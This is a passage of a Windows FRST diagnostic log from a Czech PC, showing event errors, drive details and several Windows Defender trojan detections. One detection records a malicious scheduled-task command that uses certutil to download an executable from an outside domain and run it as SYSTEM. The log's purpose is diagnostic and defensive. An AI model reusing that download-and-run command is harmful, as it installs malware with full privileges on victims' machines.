FirewallRules: [{E81F9AC5-5422-4213-958F-C5671008BBC2}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
==================== Restore Points =========================
21-08-2020 18:30:55 Naplánovaný kontrolní bod
28-08-2020 22:33:27 Naplánovaný kontrolní bod
29-08-2020 18:01:40 Operace obnovení
08-09-2020 17:10:36 Naplánovaný kontrolní bod
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 65536 (0x0000000000010000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 32768 (0x0000000000008000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 16384 (0x0000000000004000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 8192 (0x0000000000002000) o 8192 (0x00002000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 8192 (0x00002000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
System errors:
=============
Error: (09/11/2020 02:14:35 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: Server {E60687F7-01A1-40AA-86AC-DB1CBF673334} se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 02:14:28 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 02:12:35 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Služba wuauserv byla ukončena s následující chybou:
Systém nemůže nalézt uvedený soubor.
Error: (09/11/2020 02:10:04 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 06:52:10 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: Server {E60687F7-01A1-40AA-86AC-DB1CBF673334} se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 06:50:10 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Služba wuauserv byla ukončena s následující chybou:
Systém nemůže nalézt uvedený soubor.
Error: (09/11/2020 06:50:09 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: Server {E60687F7-01A1-40AA-86AC-DB1CBF673334} se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 06:49:43 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Windows Defender:
===================================
Date: 2020-08-29 22:36:38.516
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Wacatac.C!ml&threatid=2147749372&enterprise=0
Název: Trojan:Win32/Wacatac.C!ml
ID: 2147749372
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Program Files\M3PY0PHHSX\M3PY0PHHS.exe; file:_C:\Users\Milan\AppData\Local\Temp\acmiqlndjnf\zod1s2pvolq.exe; regkey:_HKCU@S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\KSK4ZMS2XB6IF7Y; runkey:_HKCU@S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\KSK4ZMS2XB6IF7Y
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Ochrana v reálném čase
Uživatel: DESKTOP-AJHPLSQ\Milan
Název procesu: C:\Windows\explorer.exe
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
Date: 2020-08-29 22:36:38.513
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Hynamer.C!ml&threatid=2147749152&enterprise=0
Název: Trojan:Win32/Hynamer.C!ml
ID: 2147749152
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Roaming\3k52z4f5aim\et53zradlff.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
Date: 2020-08-29 22:36:38.510
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Wacatac.DB!ml&threatid=2147757790&enterprise=0
Název: Trojan:Win32/Wacatac.DB!ml
ID: 2147757790
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Local\Temp\lttfjp4yc3u\vujrxhyhkrm.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
Date: 2020-08-29 22:36:38.508
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Cryptinject!MTB&threatid=2147729037&enterprise=0
Název: Trojan:Win32/Cryptinject!MTB
ID: 2147729037
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Local\Temp\dzekzdxxrlm\ifhvvyy.exe; file:_C:\Users\Milan\AppData\Local\Temp\r04v3ss32nl\ifhvvyy.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Ochrana v reálném čase
Uživatel: DESKTOP-AJHPLSQ\Milan
Název procesu: C:\Program Files (x86)\oizjd\53280214.exe
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
Date: 2020-08-29 22:35:50.832
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://bbistrovantonbb.com/app/app.exe C:\Users\Milan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Milan\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
CodeIntegrity:
===================================
Date: 2020-09-11 14:25:55.869
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\snxhk.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-11 14:25:52.828
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-11 14:25:52.810
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\snxhk.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-11 14:25:26.164
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-11 14:25:25.360
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-11 14:25:25.118
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-11 14:25:24.701
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-11 14:25:23.844
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
==================== Memory info ===========================
BIOS: Award Software International, Inc. F3 07/28/2010
Motherboard: Gigabyte Technology Co., Ltd. GA-770T-D3L
Processor: AMD Athlon(tm) II X2 250 Processor
Percentage of memory in use: 38%
Total physical RAM: 12285.55 MB
Available physical RAM: 7549.64 MB
Total Virtual: 14141.55 MB
Available Virtual: 7726.57 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:476.31 GB) (Free:276.58 GB) NTFS
Drive e: (HDD-1000) (Fixed) (Total:931.51 GB) (Free:737.23 GB) NTFS
Drive f: (ZelenyHDD) (Fixed) (Total:465.76 GB) (Free:28.95 GB) NTFS
Drive g: (Car Mechanic Simulator 2018 Merc) (CDROM) (Total:7.51 GB) (Free:0 GB) UDF
\\?\Volume{5d2f0ce6-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{5d2f0ce6-0000-0000-0000-101a77000000}\ () (Fixed) (Total:0.53 GB) (Free:0.08 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 476.9 GB) (Disk ID: 5D2F0CE6)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=476.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=543 MB) - (Type=27)
==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 8C19AC0D)
Partition: GPT.
==========================================================
Disk: 2 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: BFAA9354)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================